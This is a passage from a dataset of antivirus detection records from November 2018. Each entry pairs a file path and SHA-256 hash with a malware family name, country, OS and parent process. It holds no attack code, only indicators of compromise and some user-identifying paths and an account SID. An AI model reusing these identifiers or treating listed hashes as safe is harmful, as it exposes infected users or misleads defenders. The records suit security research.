  Row(detection=Row(filename='avscan-20181102-110540-e2231c6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110540-E2231C6B', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101958-9e93c0e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101958-9E93C0E2', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T17:57:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered cinif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cinif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a6ffd8c8dd7444b7f4c9871851225d5f087825d9e75c992b12de2ce4fded8d8b', metadata=Row(cmdline='{6EB31869-6C48-47AE-8B63-06404A1DD15F} S-1-5-21-4176333140-843296748-4195629615-1000:Tom-PC\\\\\\\\Tom:Interactive:Highest[1]', country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T06:54:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090416-726c1543', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-090406-710B415A\\AVSCAN-20181102-090416-726C1543', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adb.exe', filepath='E:\\Program Files\\SRSRoot\\adb.exe', filesize=896000, name='W32/Sality.AT.#M1.#R1'), hash='dba925fd5808e08c2accddcbf25f4ec77c6b72268dbed4df221f1ddea2015655', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='181934393.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\181934393.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T17:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='indexes-dataalr.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Autodesk\\AutoCAD 2012 - English\\Help\\indexes-dataALR.html', filesize=616000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='a5da0630d30ec1751cd9bd3c570afd4682239c879beb7e780786916c59ae8910', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T14:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dvbviewer pro 5.3.2 multilingual + pre activated.tar', filepath='\\?\\E:\\Test\\DVBViewer Pro 5.3.2 Multilingual + Pre Activated\\DVBViewer Pro 5.3.2 Multilingual + Pre Activated.tar', filesize=8192000, name='HEUR/AGEN.1021559.#M1.#R1'), hash='8fdb785228f7b4eadfbde907521cc204e8fb7592ba189a33e0fb632577f7ef53', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:46:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\MICROS~1\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tPzYLeUl\\\\\\/E6lvBOB.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T09:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (4).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:35:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132334-852ae452', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-132006-6D0AB6EB\\AVSCAN-20181102-132334-852AE452', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='privacy', filepath='/Library/Application Support/Malwarebytes/MBAM/Quarantine/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131725-2e9fcb45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131725-2E9FCB45', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='приложение №3-бюджетная заявка, анкета.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка 2016 год\\приложение №3-бюджетная заявка, анкета.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c6e8dc8be7ba7cfa1997ffbe67e13d5e48f4f1f41da7cb6e1131047cee93f29f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\C6E8DC8BE7BA7CFA1997FFBE67E13D5E48F4F1F41DA7CB6E1131047CEE93F29F', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='c6e8dc8be7ba7cfa1997ffbe67e13d5e48f4f1f41da7cb6e1131047cee93f29f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vegeta.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Vegeta\\Vegeta.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='aff9b1623df708ed64ee6b6c3aac25a2203d4bf253a768e47dd2c87ae2938a68', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='90d5d54a42d25213105034790875ad1d074f2b60424fc844f819963b7e6a590d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T06:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-034047-84102ac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84b0818a\\AVSCAN-20181102-033952-7E461D8B\\AVSCAN-20181102-034047-84102AC1', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023835c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023835c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl10.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl10.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002947b4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002947b4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:40:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C7SauQ2RaUSQisjm.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090024-959adde0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085451-691AEBAE\\AVSCAN-20181104-090024-959ADDE0', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:59:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232926-7111b5d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3284563\\AVSCAN-20181104-232222-3AD0C4A6\\AVSCAN-20181104-232926-7111B5D3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:29:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='junk store_pop3e8a42_1cc_3328_1104_pop3_vodafone_ip_de_110.hxml', filepath='\\?\\D:\\Hexamail\\Hexamail POP3 Downloader\\emailjunk\\Junk Store_POP3E8A42_1CC_3328_1104_pop3_vodafone_ip_de_110.hxml', filesize=12000, name='VBS/Dldr.Agent.8061.#M1.#R1'), hash='efd2372c14d17517754b21855910027cb62ccee019d0749113a25f12a0f75a01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:47:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029294a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029294a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170045-58b98e09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-170045-58B98E09', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='f34c41752243de42a9999f10d86bcf841eb7690fcfd397f3bf0d94612e910222', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl107.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl107.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239c24', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239c24', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:47:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FE479FF96B15ACDD5389B3A0C1FE30C95B5570C629AFD150A3ED2E7BB2E60ACA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F612DA637C2F256A08B72B65265240ED835766C19DA1BBB82A86E76FD8A43B53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftx global vector configuration tool - copyx - copy2 - copy (3).exe', filepath='c:\\program files (x86)\\microsoft games\\microsoft flight simulator x\\orbx\\ftx_vector\\ftx global vector configuration tool - copyx - copy2 - copy (3).exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:05:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006935', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp00006935', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T16:30:01Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='idiliwtygoxoalhy', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\idiliwtygoxoalhy', filesize=768000, name='TR/Patched.Bolik.Gen8.#M300.#R700918'), hash='701366491a58a890eb4f141435dfe0842ade497f113034167f1ad20a7474e803', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerdata.exe', filepath='E:\\HBCD\\Programs\\PowerData.exe', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='261a2382fa82e428efc26f72c5a59cbbb78e34b82b0156611d28b6066a424608', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4944545\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\pivot_v4-2.exe', parentsize=1903968, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:59:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:19:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\BKP\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:5FmdsfPG\\\\\\/0udnbF1.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T15:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T15:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233638-2f9451a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-233638-2F9451A5', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:38Z'), dt=datetime.date(2018, 11, 2)),
